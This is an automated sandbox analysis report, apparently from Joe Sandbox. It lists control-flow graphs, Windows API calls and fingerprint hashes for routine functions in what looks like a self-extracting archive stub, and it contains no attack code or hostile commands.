                                                                                                                    control_flow_graph 838 59d78f-59d7a7 call 59ec50 841 59d9e8-59d9f0 838->841 842 59d7ad-59d7b9 call 5a3e13 838->842 842->841 845 59d7bf-59d7e7 call 59fff0 842->845 848 59d7e9 845->848 849 59d7f1-59d7ff 845->849 848->849 850 59d801-59d804 849->850 851 59d812-59d818 849->851 852 59d808-59d80e 850->852 853 59d85b-59d85e 851->853 855 59d810 852->855 856 59d837-59d844 852->856 853->852 854 59d860-59d866 853->854 859 59d868-59d86b 854->859 860 59d86d-59d86f 854->860 861 59d822-59d82c 855->861 857 59d84a-59d84e 856->857 858 59d9c0-59d9c2 856->858 862 59d854-59d859 857->862 863 59d9c6 857->863 858->863 859->860 864 59d882-59d898 call 58b92d 859->864 860->864 865 59d871-59d878 860->865 866 59d81a-59d820 861->866 867 59d82e 861->867 862->853 871 59d9cf 863->871 874 59d89a-59d8a7 call 591fbb 864->874 875 59d8b1-59d8bc call 58a231 864->875 865->864 868 59d87a 865->868 866->861 870 59d830-59d833 866->870 867->856 868->864 870->856 873 59d9d6-59d9d8 871->873 877 59d9da-59d9dc 873->877 878 59d9e7 873->878 874->875 883 59d8a9 874->883 884 59d8d9-59d8dd 875->884 885 59d8be-59d8d5 call 58b6c4 875->885 877->878 881 59d9de-59d9e1 ShowWindow 877->881 878->841 881->878 883->875 888 59d8e4-59d8e6 884->888 885->884 888->878 889 59d8ec-59d8f9 888->889 890 59d8fb-59d902 889->890 891 59d90c-59d90e 889->891 890->891 892 59d904-59d90a 890->892 893 59d910-59d919 891->893 894 59d925-59d944 call 59dc3b 891->894 892->891 895 59d97b-59d987 CloseHandle 892->895 893->894 900 59d91b-59d923 ShowWindow 893->900 894->895 908 59d946-59d94e 894->908 898 59d989-59d996 call 591fbb 895->898 899 59d998-59d9a6 895->899 898->871 898->899 899->873 901 59d9a8-59d9aa 899->901 900->894 901->873 904 59d9ac-59d9b2 901->904 904->873 907 59d9b4-59d9be 904->907 907->873 908->895 909 59d950-59d961 GetExitCodeProcess 908->909 909->895 910 59d963-59d96d 909->910 911 59d96f 910->911 912 59d974 910->912 911->912 912->895
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 0059D7AE
                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 0059D8DE
                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 0059D91D
                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0059D959
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0059D97F
                                                                                                                    • ShowWindow.USER32(?,00000001), ref: 0059D9E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                                                                                    • String ID: .exe$.inf$PDu<Y$hY$rY
                                                                                                                    • API String ID: 36480843-1771962381
                                                                                                                    • Opcode ID: 9ceb659aec1f0b52e0371b2aef6cd222196266ca0fb02f16a931e64fd709778e
                                                                                                                    • Instruction ID: ca14a68a73342e61d74650b64c7c9472dd3e8efb3687f778ddd4695c7a1cf052
                                                                                                                    • Opcode Fuzzy Hash: 9ceb659aec1f0b52e0371b2aef6cd222196266ca0fb02f16a931e64fd709778e
                                                                                                                    • Instruction Fuzzy Hash: 0351B2714083849AEF30AB24D848BABBFF8BF95744F04081EF9C5971A1E7719949DB72
                                                                                                                    Function 005AA95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 913 5aa95b-5aa974 914 5aa98a-5aa98f 913->914 915 5aa976-5aa986 call 5aef4c 913->915 917 5aa99c-5aa9c0 MultiByteToWideChar 914->917 918 5aa991-5aa999 914->918 915->914 922 5aa988 915->922 920 5aab53-5aab66 call 59fbbc 917->920 921 5aa9c6-5aa9d2 917->921 918->917 923 5aaa26 921->923 924 5aa9d4-5aa9e5 921->924 922->914 927 5aaa28-5aaa2a 923->927 928 5aa9e7-5aa9f6 call 5b2010 924->928 929 5aaa04-5aaa15 call 5a8e06 924->929 931 5aab48 927->931 932 5aaa30-5aaa43 MultiByteToWideChar 927->932 928->931 938 5aa9fc-5aaa02 928->938 929->931 939 5aaa1b 929->939 937 5aab4a-5aab51 call 5aabc3 931->937 932->931 936 5aaa49-5aaa5b call 5aaf6c 932->936 943 5aaa60-5aaa64 936->943 937->920 942 5aaa21-5aaa24 938->942 939->942 942->927 943->931 945 5aaa6a-5aaa71 943->945 946 5aaaab-5aaab7 945->946 947 5aaa73-5aaa78 945->947 948 5aaab9-5aaaca 946->948 949 5aab03 946->949 947->937 950 5aaa7e-5aaa80 947->950 953 5aaacc-5aaadb call 5b2010 948->953 954 5aaae5-5aaaf6 call 5a8e06 948->954 951 5aab05-5aab07 949->951 950->931 952 5aaa86-5aaaa0 call 5aaf6c 950->952 955 5aab09-5aab22 call 5aaf6c 951->955 956 5aab41-5aab47 call 5aabc3 951->956 952->937 966 5aaaa6 952->966 953->956 968 5aaadd-5aaae3 953->968 954->956 969 5aaaf8 954->969 955->956 970 5aab24-5aab2b 955->970 956->931 966->931 971 5aaafe-5aab01 968->971 969->971 972 5aab2d-5aab2e 970->972 973 5aab67-5aab6d 970->973 971->951 974 5aab2f-5aab3f WideCharToMultiByte 972->974 973->974 974->956 975 5aab6f-5aab76 call 5aabc3 974->975 975->937
                                                                                                                    APIs
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,005A5695,005A5695,?,?,?,005AABAC,00000001,00000001,2DE85006), ref: 005AA9B5
                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,005AABAC,00000001,00000001,2DE85006,?,?,?), ref: 005AAA3B
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 005AAB35
                                                                                                                    • __freea.LIBCMT ref: 005AAB42
                                                                                                                      • Part of subcall function 005A8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005ACA2C,00000000,?,005A6CBE,?,00000008,?,005A91E0,?,?,?), ref: 005A8E38
                                                                                                                    • __freea.LIBCMT ref: 005AAB4B
                                                                                                                    • __freea.LIBCMT ref: 005AAB70
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1414292761-0
                                                                                                                    • Opcode ID: c130cb8fee9d94aa1ba61d16be18eb7088f6c757da6943138c40a1c9a7254846
                                                                                                                    • Instruction ID: fc86ecbb3b365a721689f8ed59286b4e2063d2e8641fd952316621be44bf2c33
                                                                                                                    • Opcode Fuzzy Hash: c130cb8fee9d94aa1ba61d16be18eb7088f6c757da6943138c40a1c9a7254846
                                                                                                                    • Instruction Fuzzy Hash: 3B51C17260021AAFDB258E64CC46EBFBFAAFB86710F154628FD14D6150EB34DC40D6A2
                                                                                                                    Function 005A3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 978 5a3b72-5a3b7c 979 5a3bee-5a3bf1 978->979 980 5a3b7e-5a3b8c 979->980 981 5a3bf3 979->981 983 5a3b8e-5a3b91 980->983 984 5a3b95-5a3bb1 LoadLibraryExW 980->984 982 5a3bf5-5a3bf9 981->982 985 5a3c09-5a3c0b 983->985 986 5a3b93 983->986 987 5a3bfa-5a3c00 984->987 988 5a3bb3-5a3bbc GetLastError 984->988 985->982 992 5a3beb 986->992 987->985 991 5a3c02-5a3c03 FreeLibrary 987->991 989 5a3bbe-5a3bd3 call 5a6088 988->989 990 5a3be6-5a3be9 988->990 989->990 995 5a3bd5-5a3be4 LoadLibraryExW 989->995 990->992 991->985 992->979 995->987 995->990
                                                                                                                    APIs
                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,005A3C35,?,?,005E2088,00000000,?,005A3D60,00000004,InitializeCriticalSectionEx,005B6394,InitializeCriticalSectionEx,00000000), ref: 005A3C03
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeLibrary
                                                                                                                    • String ID: api-ms-
                                                                                                                    • API String ID: 3664257935-2084034818
                                                                                                                    • Opcode ID: fc334246066537360f9e9ac4846707008e73e6784fa7bed2d26054cdbe05b4bb
                                                                                                                    • Instruction ID: 60af11accc62aa392aab8e9942dbcf4b9872d400282c33e52471e2e400fed433
                                                                                                                    • Opcode Fuzzy Hash: fc334246066537360f9e9ac4846707008e73e6784fa7bed2d26054cdbe05b4bb
                                                                                                                    • Instruction Fuzzy Hash: 8011E735A05229ABCB218B589C4575D7F65BF13774F250250F811FB190E770FF0496E0
                                                                                                                    Function 0059AC16 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0059081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00590836
                                                                                                                      • Part of subcall function 0059081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0058F2D8,Crypt32.dll,00000000,0058F35C,?,?,0058F33E,?,?,?), ref: 00590858
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0059AC2F
                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0059AC66
                                                                                                                    • SHGetMalloc.SHELL32(005C8438), ref: 0059AC70
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                                                    • String ID: riched20.dll$3Ro
                                                                                                                    • API String ID: 3498096277-3613677438
                                                                                                                    • Opcode ID: 05b9d66a7bcc8755c8ca8cb403e9ad1677a17a00c6718bee256a97f3206e128c
                                                                                                                    • Instruction ID: 4fc5523840911f37e303a16190d5b86a784bed8b413db631dbe3889ee96c4fe5
                                                                                                                    • Opcode Fuzzy Hash: 05b9d66a7bcc8755c8ca8cb403e9ad1677a17a00c6718bee256a97f3206e128c
                                                                                                                    • Instruction Fuzzy Hash: 01F0E7B190024AAACB14AFA9D98D9AEFFBCEF94704F00415AA455A2241DBB456058BA1
                                                                                                                    Function 005898E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1000 5898e0-589901 call 59ec50 1003 58990c 1000->1003 1004 589903-589906 1000->1004 1006 58990e-58991f 1003->1006 1004->1003 1005 589908-58990a 1004->1005 1005->1006 1007 589921 1006->1007 1008 589927-589931 1006->1008 1007->1008 1009 589933 1008->1009 1010 589936-589943 call 586edb 1008->1010 1009->1010 1013 58994b-58996a CreateFileW 1010->1013 1014 589945 1010->1014 1015 5899bb-5899bf 1013->1015 1016 58996c-58998e GetLastError call 58bb03 1013->1016 1014->1013 1018 5899c3-5899c6 1015->1018 1020 5899c8-5899cd 1016->1020 1022 589990-5899b3 CreateFileW GetLastError 1016->1022 1018->1020 1021 5899d9-5899de 1018->1021 1020->1021 1023 5899cf 1020->1023 1024 5899ff-589a10 1021->1024 1025 5899e0-5899e3 1021->1025 1022->1018 1028 5899b5-5899b9 1022->1028 1023->1021 1026 589a2e-589a39 1024->1026 1027 589a12-589a2a call 590602 1024->1027 1025->1024 1029 5899e5-5899f9 SetFileTime 1025->1029 1027->1026 1028->1018 1029->1024
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00587760,?,00000005,?,00000011), ref: 0058995F
                                                                                                                    • GetLastError.KERNEL32(?,?,00587760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0058996C
                                                                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00587760,?,00000005,?), ref: 005899A2
                                                                                                                    • GetLastError.KERNEL32(?,?,00587760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 005899AA
                                                                                                                    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00587760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 005899F9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$CreateErrorLast$Time
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1999340476-0
                                                                                                                    • Opcode ID: 30fd401052ee1910cd0171babc24cd25fb22f15f2650ec37a1c747c89ee60c8e
                                                                                                                    • Instruction ID: f4ac47d96749134b219e9c4fbf5cf127796f26308f0f3b0c8e8c51e784501c6c
                                                                                                                    • Opcode Fuzzy Hash: 30fd401052ee1910cd0171babc24cd25fb22f15f2650ec37a1c747c89ee60c8e
                                                                                                                    • Instruction Fuzzy Hash: BF310430544745AFE730AF24CC4ABFABF94BB54320F280B19FDA5A61D1D7B4A948CB91
                                                                                                                    Function 0059B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1059 59b568-59b581 PeekMessageW 1060 59b5bc-59b5be 1059->1060 1061 59b583-59b597 GetMessageW 1059->1061 1062 59b599-59b5a6 IsDialogMessageW 1061->1062 1063 59b5a8-59b5b6 TranslateMessage DispatchMessageW 1061->1063 1062->1060 1062->1063 1063->1060
                                                                                                                    APIs
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0059B579
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0059B58A
                                                                                                                    • IsDialogMessageW.USER32(00010448,?), ref: 0059B59E
                                                                                                                    • TranslateMessage.USER32(?), ref: 0059B5AC
                                                                                                                    • DispatchMessageW.USER32(?), ref: 0059B5B6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1266772231-0
                                                                                                                    • Opcode ID: 7dce60f53c937b26649dba96e31b2642f6bdbdcb6f585dfd59cffb4ccffa363d
                                                                                                                    • Instruction ID: 3523d7a3fe423210142a21101a66780d02bb2aea615d146bd46599c76e0390dc
                                                                                                                    • Opcode Fuzzy Hash: 7dce60f53c937b26649dba96e31b2642f6bdbdcb6f585dfd59cffb4ccffa363d
                                                                                                                    • Instruction Fuzzy Hash: D5F01DB1A0116AABDF249BE1EC8CDEB7FBCEE153907404414B505D3010EB34D609DBB0
                                                                                                                    Function 0059ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1064 59abab-59abca GetClassNameW 1065 59abcc-59abe1 call 591fbb 1064->1065 1066 59abf2-59abf4 1064->1066 1071 59abf1 1065->1071 1072 59abe3-59abef FindWindowExW 1065->1072 1068 59abff-59ac01 1066->1068 1069 59abf6-59abf9 SHAutoComplete 1066->1069 1069->1068 1071->1066 1072->1071
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 0059ABC2
                                                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0059ABF9
                                                                                                                      • Part of subcall function 00591FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0058C116,00000000,.exe,?,?,00000800,?,?,?,00598E3C), ref: 00591FD1
                                                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0059ABE9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                    • String ID: EDIT
                                                                                                                    • API String ID: 4243998846-3080729518
                                                                                                                    • Opcode ID: 3df9fc4ee1b489dbe248294738b19a5f7bee06325cdf8558f4161d648463e4e1
                                                                                                                    • Instruction ID: 43e3e89a6fe680022fe0f2d3b66ee018aa30d3b18a1c688ee8794155e9e5cd6f
                                                                                                                    • Opcode Fuzzy Hash: 3df9fc4ee1b489dbe248294738b19a5f7bee06325cdf8558f4161d648463e4e1
                                                                                                                    • Instruction Fuzzy Hash: 05F0823260022976DF20A6259C4DFEB7AADAB86B40F484061BA45A7180DB60EA4985F6
                                                                                                                    Function 0059DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1073 59dbde-59dc09 call 59ec50 SetEnvironmentVariableW call 590371 1077 59dc0e-59dc12 1073->1077 1078 59dc14-59dc18 1077->1078 1079 59dc36-59dc38 1077->1079 1080 59dc21-59dc28 call 59048d 1078->1080 1083 59dc1a-59dc20 1080->1083 1084 59dc2a-59dc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1079
                                                                                                                    APIs
                                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0059DBF4
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0059DC30
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                                    • API String ID: 1431749950-3493335439
                                                                                                                    • Opcode ID: 70928177b30a107640191f374afdc2f5336147084e4fa3403f8b4c7f76f87ce0
                                                                                                                    • Instruction ID: a18885101a6abb224e92fa9fa63648e6fc52da14758252e0f451dddf7fd821ab
                                                                                                                    • Opcode Fuzzy Hash: 70928177b30a107640191f374afdc2f5336147084e4fa3403f8b4c7f76f87ce0
                                                                                                                    • Instruction Fuzzy Hash: 5BF0E5B2404225ABCF202F98DC0ABFA7F6CFF14B81B040821FDC5B6091E6B09D40D6B0
                                                                                                                    Function 00589785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1085 589785-589791 1086 58979e-5897b5 ReadFile 1085->1086 1087 589793-58979b GetStdHandle 1085->1087 1088 589811 1086->1088 1089 5897b7-5897c0 call 5898bc 1086->1089 1087->1086 1090 589814-589817 1088->1090 1093 5897d9-5897dd 1089->1093 1094 5897c2-5897ca 1089->1094 1096 5897ee-5897f2 1093->1096 1097 5897df-5897e8 GetLastError 1093->1097 1094->1093 1095 5897cc 1094->1095 1098 5897cd-5897d7 call 589785 1095->1098 1100 58980c-58980f 1096->1100 1101 5897f4-5897fc 1096->1101 1097->1096 1099 5897ea-5897ec 1097->1099 1098->1090 1099->1090 1100->1090 1101->1100 1103 5897fe-589807 GetLastError 1101->1103 1103->1100 1104 589809-58980a 1103->1104 1104->1098
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00589795
                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 005897AD
                                                                                                                    • GetLastError.KERNEL32 ref: 005897DF
                                                                                                                    • GetLastError.KERNEL32 ref: 005897FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2244327787-0
                                                                                                                    • Opcode ID: a1127fefd3337a7fe2b950b81767e4f6d7a926ce613ccab7e6128e085ae1ffc4
                                                                                                                    • Instruction ID: aa88215e41a319e55edb96cdde7e1628595ebd2074ba9a9ee74475fd7e54191d
                                                                                                                    • Opcode Fuzzy Hash: a1127fefd3337a7fe2b950b81767e4f6d7a926ce613ccab7e6128e085ae1ffc4
                                                                                                                    • Instruction Fuzzy Hash: 5E117C30914209EBDF207F64CC08A793FA9FF52720F188A29EC56F5190D774AE44AF61
                                                                                                                    Function 005AAD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
